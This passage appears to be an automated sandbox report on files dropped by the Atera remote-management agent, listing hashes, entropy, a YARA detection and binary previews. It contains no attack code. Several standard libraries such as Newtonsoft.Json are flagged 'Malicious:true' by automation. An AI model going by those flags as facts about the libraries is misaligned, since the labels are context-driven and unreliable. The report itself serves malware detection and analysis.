                                                                                                                                                                                                                                                                                                                                  SHA-512:47B536FA628608A58F6F382BBC99911EEFF706BECFAF4B1C5FF904CA768917F40C2E916BA5A31992DF0335BA5A57755F047F70AAFAAC414FC655DA0CD6F95E34
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!g.........."...0.................. ........@.. ....................................`.................................D...O.......`...............((........................................................... ............... ..H............text........ ...................... ..`.rsrc...`...........................@..@.reloc..............................@..B................x.......H........B..dq...........................................................0..........r...p... .....r...p.(.....o......(.....o......(.....o...........s......[o......s....%.o........o......s...........s....%......io....%o......o........o ...o .....(!...*..0..........r...p... .....r...p.(.....o......(.....o.......("..........s......[o......s....%.o........o#.......s$..........s.......i.J.....%......io%.......o ...o ...(.........o&...*..('...*...0..].........~(....~(....~(........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):923
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.156246271896278
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Jds4F7k1hOXrRT2/2E10PT2/+w0E1UrPT2/+7Trln:3ss757Rkqk+wik+7Nn
                                                                                                                                                                                                                                                                                                                                  MD5:D6FCBCF9C6ABC2F051772E7A7D5EDFD5
                                                                                                                                                                                                                                                                                                                                  SHA1:33D9962BCC42F021A7CEADF3D1C613B4643C66F6
                                                                                                                                                                                                                                                                                                                                  SHA-256:F523D40AE141AA8899B053D77117FCF50639708757AD4A050F3A11E8582A894A
                                                                                                                                                                                                                                                                                                                                  SHA-512:07DA40F1C43A1E35582ADE5DBBAEB47EC2922C42241BD4B950EFA76407597CF838338E27F3F5197E02F5209B27542207BEDBA9B85681955E3C326C95C1F5AC22
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />...</startup>...<runtime>....<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.....<dependentAssembly>......<assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.....</dependentAssembly>.....<dependentAssembly>......<assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.....</dependentAssembly>.....<dependentAssembly>......<assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.....</dependentAssembly>....</assemblyBinding>...</runtime>..</configuration>

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhXSnn:WBe
                                                                                                                                                                                                                                                                                                                                  MD5:39DF0BC698F203A4FEF18A68A7B0EADC
                                                                                                                                                                                                                                                                                                                                  SHA1:0EA8D556AF659E0C8D6406B5B3E7E56EE6A10188
                                                                                                                                                                                                                                                                                                                                  SHA-256:F8DD3CEC3612C302B45EA9539002625E58E528A5CB68B4B0E6C3C2A378122C1A
                                                                                                                                                                                                                                                                                                                                  SHA-512:E6FF51381293BFD52EAE39B9868968A76D94BC993BAD5566C532A30E5EE5FE121C2F5B8EAED7ACEE59E3F6B8C1B3BEBB53B07B46F572F3498B1800B0DEAC128D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=27.6

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):112168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1656661918593905
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:f6sg/V5pWyNoWSh7Wyt1M2MAlb7UkN9/EVYFfbQgL/BR18xRUmHkEWpkGI76jC:fI8/Mmb+afbQgL/f182iGIJ
                                                                                                                                                                                                                                                                                                                                  MD5:6C7379E62BB26D3368555BDD5CD83E88
                                                                                                                                                                                                                                                                                                                                  SHA1:A406C91F1FC52525244B9E9EDC2A2188154A6109
                                                                                                                                                                                                                                                                                                                                  SHA-256:B87F055078EC819250F49ABAF196D42ECD994070BE5C14A9A157E783BCDA39B4
                                                                                                                                                                                                                                                                                                                                  SHA-512:E3FB4CE3826F39F8949EEFC147D7D07F2DB0265D421710A0058DEBBA9EFF21294563FDBE62020F42649E7E4A98CF63398C7F1D14E66712C5EB8EDA1D0C4CB5D6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!g.........." ..0................. ........... ...................................`.....................................O.......8...............((..........L................................................ ............... ..H............text....... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B........................H...........<!...........................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p( ...r...p(!.........("...(#.....&..*........00......:.(......}....*..0..Z............($...,......(%...*~..........(&........($...-..(....s'...........,..((.........(%...*..........&E.......0..G........{....,.(......5~)...r'..po*...rm..pr...po+...ta...r...p(,..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\CredentialManagement.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):38952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.310423924344811
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:LINsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wg5t:MNsii6v/HS0+OJd5gpKm76tg5t
                                                                                                                                                                                                                                                                                                                                  MD5:75A85EBD35C909B1AE34FC3F37500E53
                                                                                                                                                                                                                                                                                                                                  SHA1:B7527367D4860841EA922589D66B928B27FE53CE
                                                                                                                                                                                                                                                                                                                                  SHA-256:D3C5160AB184F88A1CCF47846AAF8402200FCCD509B31A73B8AA19F529AB14FA
                                                                                                                                                                                                                                                                                                                                  SHA-512:96F4B49F8FA28A20CA893D69D7432F07D516C15C0FBCFE83891F832C15D1883518487410165206D481CDAB48C130257C073AD626E6F318F2DE31A441443CDACA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..T...........!.....f............... ........... ..............................1.....@....................................O....................p..((........................................................... ............... ..H............text...$d... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B........................H........2...O...........................................................0..+.......s.........~....%.(.....s............(.....*..........#........,..%{.....`}....*.%{.....f_}....*..0..>.......................(....}=......}>......( ...}@......(....}?....*R.{....,.r...ps....z*:..(.....(....*...0............(.......(.....*...................J.{....-..&..}....*6.(.....{....*:.(......}....*6.(.....{....*..(.....(....,.r]..ps....z.o ... ....1.r]..ps!...z..}....*6.(.....{....*..(...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.853907358895156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:w1c5uLPirbW34/wUNyb8E9VF6IYijSJIVxRFTNUJyXo:w1cKmENUEpYi601U4Xo
                                                                                                                                                                                                                                                                                                                                  MD5:5F6C8C110454CFAC8B8EE908A953868F
                                                                                                                                                                                                                                                                                                                                  SHA1:C6A2B66C840C0F9324AA255AC8D6E440B2F2F3FF
                                                                                                                                                                                                                                                                                                                                  SHA-256:9E203ED95084AB3B3F3C199712E9C76DB4D9FB3AA5D6BF004ADA9FEE328B6AD5
                                                                                                                                                                                                                                                                                                                                  SHA-512:F682720C6BE19E2B1CDE3C4A03D7D1D7211A3789127F13C1C283F838B8045EAEC4B5C570DCB07ED054BAA5C23C839836D13D0DC8F00205B34862A185C581F537
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!g.........."...0..............-... ...@....@.. ..............................9|....`..................................,..O....@..................((...`.......+............................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........!..$............................................................0../.......................(....}......(....&(.....{....Y*..0..D.......................(....}......(....-.(.......(....s....z(.....{....Yn*..(....*.0..t.......r...pr...p...s......o.... ....(.....s......o....&s......(....vl(....o......o.....!..(....&..(....o....&.o......&...*......S..o........7..R.!....BSJB............v4.0.30319......l...T...#~..........#Strings....\...4...#US.........#GUID...........#Blo

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1017
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.00184675687532
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JdArdEtPF7NhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3Ar+z7O7Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                                                                  MD5:8A743B2BAC31EB00D4BDA0EBC8DF160B
                                                                                                                                                                                                                                                                                                                                  SHA1:5564F6A8F02973D040E8409E21B2A18ECA2CA8EB
                                                                                                                                                                                                                                                                                                                                  SHA-256:31A69A6D9423CE1BCF98F5281DEB1B8F537D95609CDFA03AF9A41CBF00D1243A
                                                                                                                                                                                                                                                                                                                                  SHA-512:9F14C687EF076CEB4B903E2C5803DCB9401BDEADC00B0E090765E67B54E9BEEC733B087609D76C605C8485C7E446E8DB3A0D8AA3E17C969FC155F069070BB543
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):398888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.134219330910627
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:YjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvl:Y+e55LgIkTmyAAfTnMLvl
                                                                                                                                                                                                                                                                                                                                  MD5:E8815AB9546D6E490D2846504034579F
                                                                                                                                                                                                                                                                                                                                  SHA1:0555312ED1C700ECBC37BFCDE1140FEEE906FA0A
                                                                                                                                                                                                                                                                                                                                  SHA-256:4A48F3331F1CA29F3CD57658716A39837FCE120999CEF8E44B71FB885DBA861F
                                                                                                                                                                                                                                                                                                                                  SHA-512:67DF21BA4AEA22ED63EA7CB1E9E670815E88262E324D340B2BE7DD5361F770B12064F56016F1CD41024F6846E84B3EC0D4C61A5EE71FDF11879A7E714B0169B3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`.......N....`.................................v...O.... ..................((...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960700768144483
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:xBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUQ:xBjk38WuBcAbwoA/BkjSHXP36RMGh
                                                                                                                                                                                                                                                                                                                                  MD5:C1ED198D6A5A3B91803AE06CAD22C3F1
                                                                                                                                                                                                                                                                                                                                  SHA1:CC59677BE3ECFD80EDF5D1CF2EB90742092111A2
                                                                                                                                                                                                                                                                                                                                  SHA-256:D46156C73123F9E5F3008C58461EB19DE5935A21FD33366C4AF02682AB42C8F4
                                                                                                                                                                                                                                                                                                                                  SHA-512:26CDBA17B6546F8E9D43243EB708FCCA5DA8EB19AC164695DADB944F71CFFEEC908E9F269FE90F0163B332164D725CF0494AAB165677B588B188FFEB888D964B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ............`....................................O.......................((.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18472
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.705325491847164
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:dqHstMuvMK2tFNyb8E9VF6IYijSJIVx8s6:dXMukKeBEpYi60y
                                                                                                                                                                                                                                                                                                                                  MD5:21A4630C5A4D88DAA5C57E45FFCA3A7A
                                                                                                                                                                                                                                                                                                                                  SHA1:CD8D4B45D46F10BE5490D9A14D78C2F1B65288C6
                                                                                                                                                                                                                                                                                                                                  SHA-256:4869FC8C272289D814DD591294C9189B4D937DA08EF899D47D79D8D74557977B
                                                                                                                                                                                                                                                                                                                                  SHA-512:5B8650D6121AF5074EC65B59EE2067AC013AAB3E888FB1777FF6533F9125C453E9CEC24843468DD6C4030807CA988F9FD0E338AC54BA391C53D2F484BC4310E1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!g.........."...0..............4... ...@....@.. ...................................`.................................d4..O....@............... ..((...`......,3............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................4......H.......(#..............................................................6.(.....(....*...0..........s....%r...po......o......&..*....................0..%.......r!..p.s.......o.......,..o.......&..*.......................!!.......0..........r_..p(......i...r...p(....*....r...p....s.....r_..p(.....o.... ....(.....s........(....-.........o.....o.....o....(.......l&..-.s....%.o....%r...po.......L....(....o....&..&...o....,%.o....( ...-..o....(!...,..o....(".....,..o.....*....4..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):975
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.005145470654642
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JdsHPF7NhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3st7O7Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                                                                  MD5:DB02B24A7803C99F651940FECBE6E283
                                                                                                                                                                                                                                                                                                                                  SHA1:34EF3032B61E369535658D72BCE1E9908888EA0A
                                                                                                                                                                                                                                                                                                                                  SHA-256:207C4D442FACD06379217DD915D85D926DD622E72F6DB5814753FD2E5F8D0048
                                                                                                                                                                                                                                                                                                                                  SHA-512:9C76B6E3DBB34E2729F5C0E49A2A195C87AE11916A4479676AD09EE2C182DD83F87E826BA39DDF410B99A82EF1053571AA7A1E97426D396794C6E25E066C3849
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>.. <supportedRuntime version="v4.0" />.....</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Buffers.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22056
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.676761287031738
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Zy/fjFwUI/KQyVvKdDhG6ISDFWvYW8af0Nyb8E9VF6IYijSJIVxOqgzXU:ZuhMaVmzDC6k0EpYi60gk
                                                                                                                                                                                                                                                                                                                                  MD5:66084E1A2EF0F7EE9C19238C7F6D6DFB
                                                                                                                                                                                                                                                                                                                                  SHA1:0DE978530731CDEF53D0302D7CA32A5C56E3856C
                                                                                                                                                                                                                                                                                                                                  SHA-256:A1078DD6A3A1AB3FD28EB1B5EC10BB126C14807F3DBDA81650F75AC79AEE7E46
                                                                                                                                                                                                                                                                                                                                  SHA-512:97A4A18878BF64C20869F4A1A60CBF2A12D57413FB197C15A547CE5B1BCCA31FE36D11A4F5B300F23179C8B153B76E3C73D311545C67E6694FECEA706BA6914E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ...............................,....@.................................sC..O....`..@...............((...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):64040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.266538479286202
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:HYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607zPk:HKC9niwOepJ6TJPeb6NIUFg76Kzs
                                                                                                                                                                                                                                                                                                                                  MD5:6D09B622635ED02D52600299F6102645
                                                                                                                                                                                                                                                                                                                                  SHA1:BFE508CD7D9F302E1A5C26184A46B752F64CCECC
                                                                                                                                                                                                                                                                                                                                  SHA-256:4E27A624A06023843D8369ABAC1E042845135AF278486FD86C3680928AECF66D
                                                                                                                                                                                                                                                                                                                                  SHA-512:6C4197E00E0C10ED1FF8E073A9D080C9C913A4CF2CB1B80F047B76F788059604F60F7D750A6EE8E66C65AB02BB847E4CBF737397B9E2C849A633674DAAF9AE96
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[............" ..0.................. ........... .......................@......t.....`.................................k...O....... ...............((... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B........................H........[..h...........(.......0.........................................{#...*:.($.....}#...*..0..#........u......,.(%....{#....{#...o&...*.*v ..yN )UU.Z(%....{#...o'...X*....0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*:.($.....}*...*.0..#........u......,.(%....{*....{*...o&...*.*v ..:. )UU.Z(%....{*...o'...X*....0..M........r-..p......%..{*....................-.q.............-.&.+.......o(....()...*..{+...*..{,...*V.($...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.178769713478036
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:CP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IJHF:Ch0qjC5RMOHO420kN1+
                                                                                                                                                                                                                                                                                                                                  MD5:825B1939391B03517732A72AA489B50B
